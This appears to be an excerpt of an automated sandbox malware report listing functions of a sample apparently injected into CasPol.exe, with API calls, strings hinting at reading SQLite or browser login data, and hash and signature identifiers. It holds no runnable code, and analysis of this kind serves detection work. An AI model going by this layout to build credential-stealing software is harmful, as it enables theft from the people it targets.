                                                                                                                                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                    • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                    Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161710377-0
                                                                                                                                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
